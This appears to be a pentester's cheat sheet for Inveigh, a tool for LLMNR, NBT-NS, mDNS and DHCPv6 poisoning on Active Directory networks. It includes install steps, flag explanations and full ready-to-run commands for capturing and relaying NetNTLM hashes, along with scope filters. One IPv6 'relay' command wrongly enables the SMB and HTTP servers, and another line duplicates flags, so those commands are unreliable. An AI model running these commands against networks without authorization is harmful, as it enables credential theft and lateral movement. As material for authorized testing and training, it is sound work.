Coercion and Relay

Inveigh

My preferred tool for coercion and relay attacks is Inveigh. Inveigh is similar to MITM6 and Responder but has more customization. Also, since it’s Dotnet is can be run in both windows and Linux fairly easily.

Installation (Kali Linux)

git clone https://github.com/Kevin-Robertson/Inveigh
cd Inveigh

# Install DotNet7
wget https://packages.microsoft.com/config/debian/10/packages-microsoft-prod.deb -O packages-microsoft-prod.deb
sudo dpkg -i packages-microsoft-prod.deb
rm packages-microsoft-prod.deb
sudo apt-get update
sudo apt-get install -y dotnet-sdk-8.0

# Compile Inveigh
dotnet publish -r linux-x64 -f net8.0 -p:AssemblyName=inveigh
cd ./Inveigh/bin/Release/net8.0/linux-x64/
echo "export PATH=$PATH:$(pwd)" >> ~/.zshrc
export PATH=$PATH:$(pwd)
cd ../../../../../

Custom Flags and Variables

Inveigh has A LOT of flags, below are some of the more useful ones along with examples on how to use them. The inveigh flags generally work on toggling things on and off with flags like -SMB Y to turn on the SMB server and -SMB N to turn it off.

Help

Inveigh’s help is slightly different since the project was originally built for just windows before it was ported over to Dotnet. You can use the help to figure out the default flags.

inveigh -?

Responder Replacement

The LLMNR, NBTS, and MDNS toggle on and off the poisoners for those services. Turning all of these on will do what Responder.py does.

• LLMNR Poisoner: On=-LLMNR Y / Off=-LLMNR N

• NBT-NS Poisoner: On=-NBNS Y / Off=-NBNS N

• mDNS Poisoner: On=-MDNS Y / Off=-MDNS N

MITM6 Replacement

The DHCPv6 flag and ICMPv6 flag controls turning on / off DHCPv6 attacks. Turing them on will make inveigh do MITM6 like attacks.

• DHCPv6 Poisoner: On=-DHCPv6 Y / Off=-DHCPv6 N

• Send IPv6 Router Advertisements: On=-ICMPv6 Y / Off=-ICMPv6 N

Controlling Logging and Output

There is a lot of customization in how much it output, but in my experience it’s always best to have it log to a file and run the Console output at level 1.

• Save logs in File (tee): On=-FileOutput Y -LogOutput Y / Off=-FileOutput N -LogOutput N

• Set Console Output level: -Console <1-5> (-Console 1 is recommended)

Malicious Services

Just like Responder and MITM6, inveigh has a few malicious services like SMB, HTTP, LDAP, DNS, Proxy, and WPDA servers. Note that this does not have any many services as Responder since inveigh just has the six services.

• Malicious SMB Service: On=-SMB Y / Off=-SMB N

• Malicious HTTP Service: On=-HTTP Y / Off=-HTTP N

• Malicious LDAP Service: On=-LDAP Y / Off=-LDAP N

• Malicious DNS Service: On=-DNS Y / Off=-DNS N

• Malicious WPAD Service: On=-WPAD Y / Off=-WPAD N

• Malicious Proxy Service (I’m not sure what this is…): On=-Proxy Y / Off=-Proxy N

Limit Attack

The HUGE advantage of Inveigh over Responder and MITM6 is it’s ability to limit the attack. Both Responder and MITM6 can do some degree of filtering, but it’s much less flexible than Inveigh. There are two main cases where this is helpful to me.

1. When the whole local network is not in scope (i.e. The client cherry picked IPs). In these cases, I limit the ReplyToIPs (For Local Network Poisoing) or the ReplyToMACs (For IPv6 attacks) the active hosts list.

2. When poison-able requests are infrequent and I need to leave the poisoner running overnight. In these cases I limit the attack to a certain time period or tell it to stop after it has captured a hash.

Also, I will always set a ReplyToDomains filter for the DNS poisoner since we are going for creds and not trying to block the end users from reaching Bing… although that would be a kind thing to do.

• Limit DNS Poisoning to Domain(s): Single=-ReplyToDomains example.com / Multi=-ReplyToDomains example.com,sub.example.com

• Limit attack to IP(s): Single=-ReplyToIPs 10.0.0.2 / Multi=-ReplyToIPs 10.0.0.2,10.0.0.3

• Limit attack to Mac(s): Single=-ReplyToMACs ff:ff:ff:ff:ff:ff / Multi=-ReplyToMACs ff:ff:ff:ff:ff:ff,aa:aa:aa:aa:aa:aa

Input Files as Mac/IP Filters

There is no native support for input files for lists of IPs or Macs to filter. Therefore, I came up with the below to help this process. Note that the input file MUST be a list of IPs only, NO CIDRs OR RANGES.

Define file path variable (Prompt)

command -v vared >/dev/null && vared -p 'Target active IPs (NO CIDRs) list file path: ' -c TARGETS || read -p "Target active IPs (NO CIDRs) list file path: " TARGETS

Limited to in-scope IPs (Flag only): Only use for local network poisoning (LLMNR, NBT-NS, mDNS)

-ReplyToIPs $(tr '\n' ',' < $TARGETS | sed 's/.$//')

Limit to in-scope MACs (Flag only): Only needed for IPv6 DHCP attacks

-ReplyToMACs $(for IP in $(cat $TARGETS); do arp $IP | grep -Ev 'HWaddress| -- no entry|(incomplete)' | awk -F' ' '{print $3}'; done | tr '\n' ',' | sed 's/.$//')

Auto Shutdown

You can configure inveigh to automatically shutdown when certain criteria are hit like a time limit or a certain number of capture hashes.

• Limit Runtime (In Minutes): -RunTime <MM> (Ex: -RunTime 15 to run attack for 15 minutes

• Limit Hash Capture: -RunCount <#> (Ex: -RunCount 1 to run until 1 NetNTLM hash is captured)

Example Inveigh Commands

Below is my suggestion on full Inveigh commands to use during a pentest. Make sure to set the Domain name and targets file path before running any of the below.

Define variable (Prompt)

command -v vared >/dev/null && vared -p 'Domain of Active Directory account: ' -c ADDOMAIN || read -p "Domain of Active Directory account: " ADDOMAIN
command -v vared >/dev/null && vared -p 'Target active IPs (NO CIDRs!) list file path: ' -c TARGETS || read -p "Target active IPs (NO CIDRs\!) list file path: " TARGETS

Passive-ish Attack

Fully Passive Listener

inveigh -Inspect Y -DHCPv6 Y -MDNS Y -NBNS Y -HTTPS Y -FileOutput Y -LogOutput Y-FileOutput Y -LogOutput Y

Only capture hashes

inveigh -LLMNR N -NBNS N -MDNS N -ICMPV6 N -DNS N

IPv6 Attack

Capture Hashes (Start SMB/HTTP servers)

sudo env "PATH=$PATH" inveigh -NBNS N -LLMNR N -MDNS N -SMB Y -DHCPV6 Y -HTTP Y -ICMPv6 N -Console 1 -DNS Y -ReplyToDomains $ADDOMAIN -FileOutput Y -LogOutput Y -ReplyToMACs $(for IP in $(cat $TARGETS); do arp $IP | grep -Ev 'HWaddress| -- no entry|(incomplete)' | awk -F' ' '{print $3}'; done | tr '\n' ',' | sed 's/.$//')

Relay (No SMB/HTTP servers)

sudo env "PATH=$PATH" inveigh -NBNS N -LLMNR N -MDNS N -SMB Y -DHCPV6 Y -HTTP Y -ICMPv6 N -Console 1 -DNS Y -ReplyToDomains $ADDOMAIN -FileOutput Y -LogOutput Y -ReplyToMACs $(for IP in $(cat $TARGETS); do arp $IP | grep -Ev 'HWaddress| -- no entry|(incomplete)' | awk -F' ' '{print $3}'; done | tr '\n' ',' | sed 's/.$//')

Local Network Poisoning

Capture Hashes (Start SMB/HTTP servers)

sudo env "PATH=$PATH" inveigh -NBNS Y -LLMNR Y -MDNS Y -SMB Y -DHCPV6 N -HTTP Y -ICMPv6 N -Console 1 -DNS Y -IgnoreQueries ISATAP,isatap -ReplyToDomains $ADDOMAIN -FileOutput Y -LogOutput Y -ReplyToIPs $(tr '\n' ',' < $TARGETS | sed 's/.$//')

Relay (No SMB/HTTP servers)

sudo env "PATH=$PATH" inveigh -NBNS Y -LLMNR Y -MDNS Y -SMB N -DHCPV6 N -HTTP N -ICMPv6 N -Console 1 -DNS Y -IgnoreQueries ISATAP,isatap -ReplyToDomains $ADDOMAIN -FileOutput Y -LogOutput Y -ReplyToIPs $(tr '\n' ',' < $TARGETS | sed 's/.$//')

All-in-one (IPv6 & LNP Attack)

Capture Hashes (Start SMB/HTTP servers)

sudo env "PATH=$PATH" inveigh -NBNS Y -LLMNR Y -MDNS Y -SMB Y -DHCPV6 Y -HTTP Y -ICMPv6 N -Console 1 -DNS Y -IgnoreQueries ISATAP,isatap -ReplyToDomains $ADDOMAIN -FileOutput Y -LogOutput Y -ReplyToIPs $(tr '\n' ',' < $TARGETS | sed 's/.$//') -ReplyToMACs $(for IP in $(cat $TARGETS); do arp $IP | grep -Ev 'HWaddress| -- no entry|(incomplete)' | awk -F' ' '{print $3}'; done | tr '\n' ',' | sed 's/.$//')

Relay (No SMB/HTTP servers)

sudo env "PATH=$PATH" inveigh -NBNS Y -LLMNR Y -MDNS Y -SMB N -DHCPV6 Y -HTTP N -ICMPv6 N -Console 1 -DNS Y -IgnoreQueries ISATAP,isatap -ReplyToDomains $ADDOMAIN -FileOutput Y -LogOutput Y -ReplyToIPs $(tr '\n' ',' < $TARGETS | sed 's/.$//') -ReplyToMACs $(for IP in $(cat $TARGETS); do arp $IP | grep -Ev 'HWaddress| -- no entry|(incomplete)' | awk -F' ' '{print $3}'; done | tr '\n' ',' | sed 's/.$//')